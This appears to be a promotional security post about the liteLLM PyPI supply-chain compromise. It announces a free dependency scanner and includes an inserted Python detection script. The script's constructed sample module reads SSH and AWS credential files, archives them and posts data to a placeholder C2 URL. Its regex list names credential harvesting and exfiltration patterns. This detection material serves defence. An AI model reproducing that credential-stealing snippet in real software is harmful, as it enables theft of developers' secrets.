The March 24th #liteLLM compromise isn’t just another vulnerable package; it is a masterclass in why relying solely on CVE databases is a fundamentally broken security posture.
For those catching up, the threat group TeamPCP compromised the Trivy GitHub Action to steal PyPI publisher credentials, publishing malicious versions (1.82.7 and 1.82.8) of the liteLLM package. If you ran pip install during the exposure window, the payload executed in three layers:
- Exfiltration: AES-256-CBC encrypted archive sent to a remote C2 server.
- Credential Harvesting: Aggressive targeting of ~/.ssh, AWS/GCP/Azure credentials, Kubernetes configs, and API keys.
- Persistence: Establishing a sysmon.py backdoor that polls the C2 endpoint every 50 minutes.
Traditional vulnerability scanners missed this entirely because no CVE existed. They look for known bad patterns, not malicious behavior — let alone malicious intent.
When the scope of this attack became clear, our engineering team @Threat Point mobilized instantly. In the face of a critical ecosystem exploit, we knew we had to ship a practical, zero-day defense tool to developers globally. We shipped v0.1.0 in <24 hours. Expect some false positives. It’s a flashlight in a dark room for immediate visibility while we actively iterate to reduce noise.
To give teams an immediate way to triage their environments, we built and open-sourced: who-touched-my-packages (wtmp).
Here is what the tool does:
- Dependency Graphing: Uses Node.js and Python tools to generate a full dependency graph (ensure your dependencies are downloaded as usual prior to scanning).
- Local CVE Cross-Referencing: Downloads two sources of vulnerabilities directly to your device (GitHub Advisories and Google’s OSV) and matches your dependency versions against them.
- Active Behavioral Scanning (Zero-Day Defense): You can optionally pass an Anthropic, OpenAI, or OpenRouter API key via an environment variable. If an API key is provided, an agentic AI process built on the latest LangGraph tooling will deeply scan every dependency.
- Targeted Threat Detection: The agentic LLM process not only actively hunts for the exact zero-day mechanisms used in yesterday’s attack, but it more broadly identifies dozens of threat indicator patterns common in supply chain compromises. This includes data exfiltration, credential harvesting, crypto wallet theft, environment scanning, code obfuscation, persistence, data packaging, and CI/CD poisoning.
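To make the layered pattern described above concrete, here is an added example (not wtmp's code or rules): a small rule-based triage script that flags the two malicious liteLLM versions named in this post in `pip freeze` output, then scans a module's source for the indicator categories listed and rates a staged collect/package/send chain as HIGH. The regexes, category names and sample inputs are constructed for illustration.

```python
from __future__ import annotations
import re

# Versions named in the post; the post gives no other IoCs, so nothing else is hard-coded.
KNOWN_BAD_VERSIONS = {"litellm": {"1.82.7", "1.82.8"}}

# Hypothetical regex indicators for the threat categories the post lists.
# Illustrative heuristics written for this example, not the wtmp project's rules.
INDICATORS = {
    "credential_harvesting": r"\.ssh/|\.aws/credentials|\.kube/config|\.azure/|\.config/gcloud",
    "code_obfuscation": r"exec\s*\(\s*(?:base64\.b64decode|marshal\.loads|zlib\.decompress)",
    "data_packaging": r"tarfile\.open|zipfile\.ZipFile|shutil\.make_archive|AES\.new",
    "exfiltration": r"requests\.post\s*\(|urlopen\s*\(|\.sendall\s*\(",
    "persistence": r"crontab|\.bashrc|systemd|LaunchAgents|sysmon\.py",
    "environment_scanning": r"os\.environ|platform\.uname|gethostname\s*\(",
}
COMPILED = {name: re.compile(pat) for name, pat in INDICATORS.items()}


def flag_bad_versions(freeze_output: str) -> list[tuple[str, str]]:
    """Return (package, version) pairs from `pip freeze` text that match a known-bad release."""
    hits = []
    for line in freeze_output.splitlines():
        if "==" not in line:
            continue
        name, version = line.strip().split("==", 1)
        if version in KNOWN_BAD_VERSIONS.get(name.lower(), set()):
            hits.append((name, version))
    return hits


def scan_source(source: str) -> dict[str, list[int]]:
    """Map each indicator category to the 1-based line numbers where it fires."""
    findings: dict[str, list[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for category, rx in COMPILED.items():
            if rx.search(line):
                findings.setdefault(category, []).append(lineno)
    return findings


def classify(findings: dict[str, list[int]]) -> str:
    """Collect secrets, package them, send them out => HIGH; a single category alone is only LOW."""
    cats = set(findings)
    if "exfiltration" in cats and cats & {"credential_harvesting", "data_packaging"}:
        return "HIGH"
    return "MEDIUM" if len(cats) >= 2 else ("LOW" if cats else "NONE")


# Constructed sample inputs (not real package code): a freeze listing and a suspect module.
SAMPLE_FREEZE = "requests==2.32.3\nlitellm==1.82.7\nnumpy==2.2.0\n"
SAMPLE_MODULE = '''import os, tarfile, requests
key = open(os.path.expanduser("~/.ssh/id_rsa")).read()
tarfile.open("/tmp/bundle.tar.gz", "w:gz").add(os.path.expanduser("~/.aws/credentials"))
requests.post(os.environ.get("C2_URL", ""), data=b"...")
'''

if __name__ == "__main__":
    print(flag_bad_versions(SAMPLE_FREEZE))  # [('litellm', '1.82.7')]
    found = scan_source(SAMPLE_MODULE)
    print(found, classify(found))  # ... HIGH
```

Regex heuristics like these are the noisy "flashlight" layer; they are cheap to run in CI before any LLM-based review and give you a short list of files worth a human or agentic second look.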
We are making this completely public and free to use.
Install globally & scan your project: https://point-wild.github.io/who-touched-my-packages/#quick-start
If your security tooling can’t analyze what a package is actually doing during execution, you are flying blind. Run your scans, rotate your keys, and secure the ecosystem.